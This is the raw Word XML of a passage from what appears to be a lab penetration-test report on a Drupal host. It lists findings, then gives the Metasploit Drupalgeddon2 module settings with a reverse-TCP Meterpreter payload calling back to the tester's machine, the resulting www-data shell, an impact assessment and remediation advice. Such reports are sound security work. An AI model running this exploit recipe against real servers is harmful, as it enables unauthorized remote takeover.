          <w:p w14:paraId="6119D59D" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3724D8F5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Drupal RCE (CVE-2018-7600)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA3EF38" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B1D045E" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="2F0DD865" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="095F028D" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>2026-01-16 02:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF196B8" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B2FCCDC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Outdated Apache Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D300B7" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00CF62CC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w14:paraId="4E14FA4F" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41335B95" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>2026-01-16 02:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4D2DA5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDCF240" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Weak SSH Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10465CE4" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76664FEC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
            <w:r w:rsidRPr="00FE33A9">
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DE1FE33" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="18FA8B48">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1DCF2" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Exploitation Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5F17B" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Web Application Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DACB0" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Accessing the target via browser confirmed a Drupal login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86ADD5" w14:textId="2713A36D" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37715EDF" wp14:editId="634BAD3F">
            <wp:extent cx="5731510" cy="3061335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1402629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29947" name="Picture 1402629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p>
    <w:p w14:paraId="1BC7B2AD" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="5EBE004D">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E58B5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Exploiting Drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E0AFE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Metasploit was used to exploit the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61389A0C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AAE27" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477E84F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2717E5E2" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>RHOSTS: 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAD801" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>RPORT: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D9474" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve">PAYLOAD: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7054E3CE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>LHOST: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4427C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>LPORT: 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35675136" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Execution resulted in a successful reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A34701" w14:textId="327B1D42" w:rsidR="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="381E32F6" wp14:editId="48CDD623">
            <wp:extent cx="5731510" cy="3055620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="173295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51633" name="Picture 1732951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2E6BD9BA" w14:textId="7A54C570" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212756E5" wp14:editId="679FE25A">
            <wp:extent cx="5731510" cy="3067685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1039271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71821" name="Picture 10392718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14:paraId="2DE7C8A8" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="3A1E7E30">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30099FF6" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A6C6B" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E2CB9" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>A Meterpreter session was established:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7685C1" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49F62111" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025F6EDC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Server username: www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C8DB2" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Dropping to a system shell confirmed execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224499BE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:lastRenderedPageBreak/>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CCAE1B8" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E422590" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7D75C" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>OS: Debian Linux 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FDBA49" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>User: www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E088DD" w14:textId="0288FFBE" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC7E082" wp14:editId="15C5FDA2">
            <wp:extent cx="5731510" cy="3058795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="225459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9561" name="Picture 2254595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2BEF7A5A" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="3EDBC6B6">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D359009" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE36BBC" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>The exploited vulnerability allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A8C331" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Full remote command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72551BF8" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Web server compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EEBF5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Potential privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F0161" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Data theft or website defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4A4E2" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Lateral movement within the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14661FE3" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Risk Level: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE1FA45" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="106314B4">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AE262" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DBC814" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597987B" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Upgrade Drupal to the latest supported version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C19234" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:lastRenderedPageBreak/>
        <w:t>Apply security patches for Apache and OpenSSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412C7D5" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Restrict access to administrative endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F890248" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Disable unnecessary services (RPC if unused).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36295E12" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-Term Security Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AB12D" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Implement Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C06FA" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Regular vulnerability scanning using OpenVAS</w:t>
      </w:r>
    </w:p>
